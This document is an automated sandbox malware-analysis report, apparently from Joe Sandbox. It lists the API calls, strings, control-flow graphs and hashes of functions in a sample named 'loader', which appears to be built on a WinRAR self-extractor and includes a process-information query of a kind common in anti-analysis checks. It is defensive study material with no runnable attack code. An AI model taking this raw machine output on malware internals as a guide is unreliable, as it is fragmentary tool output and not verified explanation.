                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0064BD7D
                                                                                    • SetDlgItemTextW.USER32(?,00000065,006635F4), ref: 0064BD94
                                                                                    • GetDlgItem.USER32(?,00000065), ref: 0064BD9D
                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0064BDAC
                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0064BDBB
                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0064BE68
                                                                                    • _wcslen.LIBCMT ref: 0064BEBE
                                                                                    • _swprintf.LIBCMT ref: 0064BEE8
                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0064BF32
                                                                                    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0064BF4C
                                                                                    • GetDlgItem.USER32(?,00000068), ref: 0064BF55
                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0064BF6B
                                                                                    • GetDlgItem.USER32(?,00000066), ref: 0064BF85
                                                                                    • SetWindowTextW.USER32(00000000,0067A472), ref: 0064BFA7
                                                                                    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0064C007
                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0064C01A
                                                                                    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0064C0BD
                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 0064C197
                                                                                    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0064C1D9
                                                                                      • Part of subcall function 0064C73F: __EH_prolog.LIBCMT ref: 0064C744
                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0064C1FD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$ItemSend$Text$Window$_swprintf$Dialog$H_prologLong_wcslen$DispatchEnableExecuteFocusParamShellShowTranslate__vswprintf_c_l_wcschr
                                                                                    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$^d$__tmp_rar_sfx_access_check_%u$hd$runas$winrarsfxmappingfile.tmp
                                                                                    • API String ID: 1533452614-3391552232
                                                                                    • Opcode ID: f2fc490754ed8c89fcc155256acbed226d2de369a1483853a9c6ede7f541071b
                                                                                    • Instruction ID: c371fe0d0150c219d5b28f2149dd0e236019ec4b22c36f98edac1649acf2c118
                                                                                    • Opcode Fuzzy Hash: f2fc490754ed8c89fcc155256acbed226d2de369a1483853a9c6ede7f541071b
                                                                                    • Instruction Fuzzy Hash: E8421870944254BEEB619FB0DC4AFFE77AF9B02700F001159F544A62E2CBB59E84CB65
                                                                                    Function 0064DF1E Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 195windowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 767 64df1e-64df66 call 640863 call 64a64d call 64ac16 call 64fff0 777 64dfe6-64e0f4 call 634092 LoadIconW call 64b6dd call 63da42 call 6490b7 * 2 DialogBoxParamW call 649178 * 2 767->777 778 64df68-64df74 call 64c5c4 767->778 815 64e0f6 777->815 816 64e0fd-64e104 777->816 782 64df76-64df8d 778->782 783 64dfe0-64dfe1 call 64dbde 778->783 788 64dfd6-64dfde 782->788 789 64df8f-64df9e 782->789 783->777 788->777 794 64dfa0-64dfcb call 650320 call 64dbde 789->794 795 64dfcd-64dfd4 789->795 794->795 795->788 815->816 817 64e106 call 64ae2f 816->817 818 64e10b-64e11c call 63f279 816->818 817->818 822 64e11e-64e129 call 64ee5c 818->822 823 64e12a-64e13d DeleteObject 818->823 822->823 825 64e146-64e14d 823->825 826 64e13f-64e140 DeleteObject 823->826 828 64e167-64e175 825->828 829 64e14f-64e156 825->829 826->825 831 64e177-64e17d call 64dc3b 828->831 832 64e189-64e196 828->832 829->828 830 64e158-64e162 call 636d83 829->830 830->828 831->832 835 64e198-64e1a4 832->835 836 64e1ba-64e1be call 64ac7c 832->836 837 64e1b4-64e1b6 835->837 838 64e1a6-64e1ae 835->838 843 64e1c3-64e1ce 836->843 837->836 842 64e1b8 837->842 838->836 841 64e1b0-64e1b2 838->841 841->836 842->836
                                                                                    APIs
                                                                                      • Part of subcall function 0064AC16: OleInitialize.OLE32(00000000), ref: 0064AC2F
                                                                                      • Part of subcall function 0064AC16: SHGetMalloc.SHELL32(00678438), ref: 0064AC70
                                                                                    • _swprintf.LIBCMT ref: 0064E048
                                                                                    • LoadIconW.USER32(00000000,00000064), ref: 0064E078
                                                                                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0064E0C9
                                                                                    • DeleteObject.GDI32 ref: 0064E130
                                                                                    • DeleteObject.GDI32(?), ref: 0064E140
                                                                                      • Part of subcall function 0064DBDE: SetEnvironmentVariableW.KERNELBASE(sfxpar,00000000), ref: 0064DC30
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: DeleteObject$DialogEnvironmentIconInitializeLoadMallocParamVariable_swprintf
                                                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xzh
                                                                                    • API String ID: 730176925-652597700
                                                                                    • Opcode ID: 0628efebc2b170d27effabed8daf915e9e13c056ce916fbfb526edccabf70e97
                                                                                    • Instruction ID: c776596a0fc7858666e94364a6be4fd9d85d6bf55b4340f2847ccb0484de85d5
                                                                                    • Opcode Fuzzy Hash: 0628efebc2b170d27effabed8daf915e9e13c056ce916fbfb526edccabf70e97
                                                                                    • Instruction Fuzzy Hash: A9610F71944211BFD360AFB4EC4AE6B7BEFAB45700F00142EF949933A1DAB48948C761
                                                                                    Function 0063A69B Relevance: 3.1, APIs: 2, Instructions: 105fileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1064 63a69b-63a6bf call 64ec50 1067 63a6c1-63a6ce FindFirstFileW 1064->1067 1068 63a727-63a730 1064->1068 1069 63a742-63a7ff call 640602 call 63c310 call 6415da * 3 1067->1069 1070 63a6d0-63a6e2 call 63bb03 1067->1070 1068->1069 1074 63a732-63a740 1068->1074 1085 63a804-63a811 1069->1085 1077 63a6e4-63a6fc FindFirstFileW 1070->1077 1078 63a6fe-63a707 1070->1078 1082 63a719-63a722 1074->1082 1077->1069 1077->1078 1086 63a717 1078->1086 1087 63a709-63a70c 1078->1087 1082->1085 1086->1082 1087->1086 1089 63a70e-63a711 1087->1089 1089->1086 1091 63a713-63a715 1089->1091 1091->1082
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,00000000,?,0063A592,000000FF,?,?), ref: 0063A6C4
                                                                                      • Part of subcall function 0063BB03: _wcslen.LIBCMT ref: 0063BB27
                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,0063A592,000000FF,?,?), ref: 0063A6F2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFindFirst$_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 1818217402-0
                                                                                    • Opcode ID: b1a186b669cf6a7c2cc8fdc42cbf1052152693489eaea1d8b9e877970e36fbb9
                                                                                    • Instruction ID: 9f20b4ba76b2fabe0bceef8b15419b4c51466497608a43eafd3d53b639577675
                                                                                    • Opcode Fuzzy Hash: b1a186b669cf6a7c2cc8fdc42cbf1052152693489eaea1d8b9e877970e36fbb9
                                                                                    • Instruction Fuzzy Hash: 3D419176900115ABCB25DFA4CCC4AE9B7BAFB49350F10419AF59EE3200D7346E94DF90
                                                                                    Function 04FF6859 Relevance: 3.0, APIs: 2, Instructions: 31nativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 04FF686D
                                                                                    • GetSystemInfo.KERNELBASE(?), ref: 04FF687F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2189140272.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4ff0000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoInformationProcessQuerySystem
                                                                                    • String ID:
                                                                                    • API String ID: 1993426926-0
                                                                                    • Opcode ID: 9fe47f2950c11057c91d520df20ea6c509abfe2eb78b1b7c4841bad8b7fbf8e3
                                                                                    • Instruction ID: 580937e649af39ad689b1c7a5ef248586fc28e1d79da6fe15f5d81b16cbfd03e
                                                                                    • Opcode Fuzzy Hash: 9fe47f2950c11057c91d520df20ea6c509abfe2eb78b1b7c4841bad8b7fbf8e3
                                                                                    • Instruction Fuzzy Hash: CCF0F876600219AFCB099F9ADC49EDE7BA8EB09790B018019FD16E7250C7319900CBA0
                                                                                    Function 0063848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: e086538854fcffef3314065d7d7e3043922c2252124d95c81032273873749af6
                                                                                    • Instruction ID: 371930520d9655b5f565653635723f6254cbba7ae99211f1ed857b60bc6aa357
                                                                                    • Opcode Fuzzy Hash: e086538854fcffef3314065d7d7e3043922c2252124d95c81032273873749af6
                                                                                    • Instruction Fuzzy Hash: 9782C771904345AEDF15DF64C891BFABBBBAF15300F0841B9F8499B242DB715A89CBE0
                                                                                    Function 00657DEE Relevance: .0, Instructions: 21COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7ca25c04729dd8d9882d3feb0495ca5edf9aa1ea9072dc016ae190078155826b
                                                                                    • Instruction ID: 0b0caa5aaf87098a6f0b1ed688663a7f3ac07909dff6ce204fa9b3ae2b0ff0d0
                                                                                    • Opcode Fuzzy Hash: 7ca25c04729dd8d9882d3feb0495ca5edf9aa1ea9072dc016ae190078155826b
                                                                                    • Instruction Fuzzy Hash: 24E04F31000248ABCF01AF10ED0A9897F6BEB00342F005458FC059A232CB75DE59CA94
                                                                                    Function 00640863 Relevance: 128.1, APIs: 4, Strings: 69, Instructions: 316COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(?,?,|<f,00000800,?,00000000,?,00000800), ref: 00640C9C
                                                                                    • _swprintf.LIBCMT ref: 00640D4A
                                                                                    • _swprintf.LIBCMT ref: 00640D96
                                                                                      • Part of subcall function 00634092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006340A5
                                                                                    • _wcslen.LIBCMT ref: 00640DC4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _swprintf$AttributesFile__vswprintf_c_l_wcslen
                                                                                    • String ID: ,<f$D=f$DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll$|<f
                                                                                    • API String ID: 2834821262-3323918312
                                                                                    • Opcode ID: e42549ad0689bb52e80ba9c614a8cbc173843e4b4308347d17e8187fdec4577b
                                                                                    • Instruction ID: 5319171e34d8289c628792532dee11081f478c3d28036bc5a35f324c8b11877c
                                                                                    • Opcode Fuzzy Hash: e42549ad0689bb52e80ba9c614a8cbc173843e4b4308347d17e8187fdec4577b
                                                                                    • Instruction Fuzzy Hash: D2D161B14083A4AFD7219F50C989BDFBEEFAF85704F50491DF28596350CBB18648CBA6
                                                                                    Function 0064C73F Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 428windowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 374 64c73f-64c757 call 64eb78 call 64ec50 379 64d40d-64d418 374->379 380 64c75d-64c787 call 64b314 374->380 380->379 383 64c78d-64c792 380->383 384 64c793-64c7a1 383->384 385 64c7a2-64c7b7 call 64af98 384->385 388 64c7b9 385->388 389 64c7bb-64c7d0 call 641fbb 388->389 392 64c7d2-64c7d6 389->392 393 64c7dd-64c7e0 389->393 392->389 394 64c7d8 392->394 395 64c7e6 393->395 396 64d3d9-64d404 call 64b314 393->396 394->396 397 64ca7c-64ca7e 395->397 398 64c7ed-64c7f0 395->398 399 64c9be-64c9c0 395->399 400 64ca5f-64ca61 395->400 396->384 411 64d40a-64d40c 396->411 397->396 403 64ca84-64ca8b 397->403 398->396 405 64c7f6-64c850 call 64a64d call 63bdf3 call 63a544 call 63a67e call 636edb 398->405 399->396 404 64c9c6-64c9d2 399->404 400->396 402 64ca67-64ca77 SetWindowTextW 400->402 402->396 403->396 407 64ca91-64caaa 403->407 408 64c9d4-64c9e5 call 657686 404->408 409 64c9e6-64c9eb 404->409 462 64c98f-64c9a4 call 63a5d1 405->462 412 64cab2-64cac0 call 653e13 407->412 413 64caac 407->413 408->409 415 64c9f5-64ca00 call 64b48e 409->415 416 64c9ed-64c9f3 409->416 411->379 412->396 431 64cac6-64cacf 412->431 413->412 420 64ca05-64ca07 415->420 416->420 425 64ca12-64ca32 call 653e13 call 653e3e 420->425 426 64ca09-64ca10 call 653e13 420->426 449 64ca34-64ca3b 425->449 450 64ca4b-64ca4d 425->450 426->425 435 64cad1-64cad5 431->435 436 64caf8-64cafb 431->436 438 64cb01-64cb04 435->438 441 64cad7-64cadf 435->441 437 64cbe0-64cbee call 640602 436->437 436->438 458 64cbf0-64cc04 call 65279b 437->458 442 64cb06-64cb0b 438->442 443 64cb11-64cb2c 438->443 441->396 447 64cae5-64caf3 call 640602 441->447 442->437 442->443 460 64cb76-64cb7d 443->460 461 64cb2e-64cb68 443->461 447->458 455 64ca42-64ca4a call 657686 449->455 456 64ca3d-64ca3f 449->456 450->396 457 64ca53-64ca5a call 653e2e 450->457 455->450 456->455 457->396 473 64cc06-64cc0a 458->473 474 64cc11-64cc62 call 640602 call 64b1be GetDlgItem SetWindowTextW SendMessageW call 653e49 458->474 467 64cb7f-64cb97 call 653e13 460->467 468 64cbab-64cbce call 653e13 * 2 460->468 494 64cb6c-64cb6e 461->494 495 64cb6a 461->495 478 64c855-64c869 462->478 479 64c9aa-64c9b9 call 63a55a 462->479 467->468 484 64cb99-64cba6 call 6405da 467->484 468->458 497 64cbd0-64cbde call 6405da 468->497 473->474 480 64cc0c-64cc0e 473->480 503 64cc67-64cc6b 474->503 498 64c90f-64c91f 478->498 499 64c86f-64c8a2 call 63b991 call 63b690 call 653e13 478->499 479->396 480->474 484->468 494->460 495->494 497->458 498->462 509 64c921-64c930 498->509 515 64c8a4-64c8b3 call 653e13 499->515 516 64c8b5-64c8c3 call 63bdb4 499->516 503->396 507 64cc71-64cc85 SendMessageW 503->507 507->396 509->462 513 64c932-64c935 509->513 517 64c939-64c965 call 634092 513->517 515->516 524 64c8c9-64c908 call 653e13 call 64fff0 515->524 516->479 516->524 528 64c937-64c938 517->528 529 64c967-64c97d 517->529 524->498 528->517 529->462 533 64c97f-64c988 529->533 533->462
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 0064C744
                                                                                      • Part of subcall function 0064AF98: _wcschr.LIBVCRUNTIME ref: 0064B033
                                                                                    • _wcslen.LIBCMT ref: 0064CA0A
                                                                                    • _wcslen.LIBCMT ref: 0064CA13
                                                                                    • SetWindowTextW.USER32(?,?), ref: 0064CA71
                                                                                    • _wcslen.LIBCMT ref: 0064CAB3
                                                                                    • _wcsrchr.LIBVCRUNTIME ref: 0064CBFB
                                                                                    • GetDlgItem.USER32(?,00000066), ref: 0064CC36
                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0064CC46
                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,0067A472), ref: 0064CC54
                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0064CC7F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$MessageSendTextWindow$H_prologItem_wcschr_wcsrchr
                                                                                    • String ID: %s.%d.tmp$<br>$<d$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$d
                                                                                    • API String ID: 3356938749-288287190
                                                                                    • Opcode ID: 78e9c63b7839bddd5d9f97526a3ea8ca45d4c3b7025584afa2dbc9191a7d8738
                                                                                    • Instruction ID: c0d8a3179d076f54485abc823ec3aeff0f5e6b24534fe7b0567a1c0d184142ee
                                                                                    • Opcode Fuzzy Hash: 78e9c63b7839bddd5d9f97526a3ea8ca45d4c3b7025584afa2dbc9191a7d8738
                                                                                    • Instruction Fuzzy Hash: DFE16472D00128AADB65DBA4DD85DEE73BEEB05350F0040AAF649E3250EF749F848F64
                                                                                    Function 0063DA67 Relevance: 30.4, APIs: 4, Strings: 13, Instructions: 663COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 0063DA70
                                                                                    • _wcschr.LIBVCRUNTIME ref: 0063DA91
                                                                                      • Part of subcall function 0063C29A: _wcslen.LIBCMT ref: 0063C2A2
                                                                                      • Part of subcall function 006405DA: _wcslen.LIBCMT ref: 006405E0
                                                                                    • _wcslen.LIBCMT ref: 0063DDE9
                                                                                    • __fprintf_l.LIBCMT ref: 0063DF1C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
